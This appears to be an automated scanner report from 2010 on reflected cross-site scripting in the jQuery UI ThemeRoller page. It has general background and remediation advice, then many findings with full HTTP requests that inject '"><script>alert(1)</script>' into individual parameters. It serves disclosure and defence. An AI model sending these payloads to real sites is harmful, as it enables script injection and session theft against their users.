Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9362f"><script>alert(1)</script>7fddcf07157 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff9362f"><script>alert(1)</script>7fddcf07157&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:28:16 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12ef6"><script>alert(1)</script>d355649fe6d was submitted in the bgColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff12ef6"><script>alert(1)</script>d355649fe6d&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:25:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b213"><script>alert(1)</script>37764a8a11e was submitted in the bgColorDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e61b213"><script>alert(1)</script>37764a8a11e&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:26:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67e9c"><script>alert(1)</script>31802c83066 was submitted in the bgColorError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef167e9c"><script>alert(1)</script>31802c83066&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:30:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20197"><script>alert(1)</script>6c15c17f767 was submitted in the bgColorHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c820197"><script>alert(1)</script>6c15c17f767&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:24:25 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e08a"><script>alert(1)</script>a833aec8e23 was submitted in the bgColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea2e08a"><script>alert(1)</script>a833aec8e23&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:29:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0f91"><script>alert(1)</script>76251dd2dbe was submitted in the bgColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadadad0f91"><script>alert(1)</script>76251dd2dbe&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:27:19 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgColorOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52c0c"><script>alert(1)</script>392fcb08d71 was submitted in the bgColorOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa52c0c"><script>alert(1)</script>392fcb08d71&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:32:04 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgColorShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7add9"><script>alert(1)</script>6148fa48b45 was submitted in the bgColorShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa7add9"><script>alert(1)</script>6148fa48b45&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:32:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgImgOpacityActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b9da"><script>alert(1)</script>86889186ca9 was submitted in the bgImgOpacityActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=02b9da"><script>alert(1)</script>86889186ca9&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:28:53 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5748e"><script>alert(1)</script>247c52aef85 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=05748e"><script>alert(1)</script>247c52aef85&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=0&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:25:45 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53ba4"><script>alert(1)</script>d9d50feafdb was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Helvetica,%20Arial,%20Geneva,%20sans-serif&fwDefault=normal&fsDefault=12px&cornerRadius=3px&bgColorHeader=d7d1c8&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=0&borderColorHeader=ffffff&fcHeader=010101&iconColorHeader=6f5645&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=0&borderColorContent=e0e0e0&fcContent=010101&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=053ba4"><script>alert(1)</script>d9d50feafdb&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=0&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=0&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fef7ea&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=0&borderColorHighlight=e0e0e0&fcHighlight=363636&iconColorHighlight=2bae64&bgColorError=fbeef1&bgTextureError=02_glass.png&bgImgOpacityError=0&borderColorError=a1203e&fcError=a1203e&iconColorError=a1203e&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Fri, 19 Nov 2010 23:26:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120099
The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f15aa"><script>alert(1)</script>ffc4cddc3d9 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
